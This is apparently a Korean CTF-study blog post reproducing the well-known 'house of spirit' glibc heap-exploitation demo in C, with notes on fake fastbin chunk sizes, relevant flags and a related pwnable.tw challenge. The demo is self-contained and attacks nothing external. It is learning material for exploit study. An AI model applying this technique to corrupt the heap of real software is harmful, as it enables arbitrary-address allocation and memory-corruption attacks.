house_of_spirit
#include <stdio.h>
#include <stdlib.h>
int main()
{
printf("This file demonstrates the house of spirit attack.n");
printf("Calling malloc() once so that it sets up its memory.n");
malloc(1);
printf("We will now overwrite a pointer to point to a fake 'fastbin' region.n");
unsigned long long *a;
// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
printf("This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[7]);
printf("This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64)."
"The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.n");
printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. "
"E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. n");
fake_chunks[1] = 0x40; // this is the size
printf("The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) "
"to pass the nextsize integrity checks. No need for fastbin size.n");
// fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
fake_chunks[9] = 0x1234; // nextsize
printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.n", &fake_chunks[1]);
printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.n");
a = &fake_chunks[2];
printf("Freeing the overwritten pointer.n");
free(a);
printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!n", &fake_chunks[1], &fake_chunks[2]);
printf("malloc(0x30): %pn", malloc(0x30));
}
관련 문제
pwnable.tw spirited_away
fake 청크의 두번째 사이즈 를 구성하는 이유 → free()함수를 정상적으로 수행하기 위해 필요함
fastbin 영역에서 prev inuse —> flag 는 중요하지 않음.
하지만 이외의 flag (IS_MMAPPED 및 **NON_MAIN_ARENA)**는 주의 요함.
결론: 임의의 주소에 힙을 할당 받을 수 있는 기법
'Pwnable > Tech' 카테고리의 다른 글
| poison_null_byte (2) | 2023.02.25 |
|---|---|
| FSOP - glibc 2.35 에서 FSOP 하는 법(feat. House of apple ) (0) | 2023.02.25 |
| .init_array && .fini_array (2) | 2023.02.20 |
| Tcache dup / glibc 2.26 (0) | 2023.02.18 |
| _IO_FILE AAR (0) | 2023.02.18 |
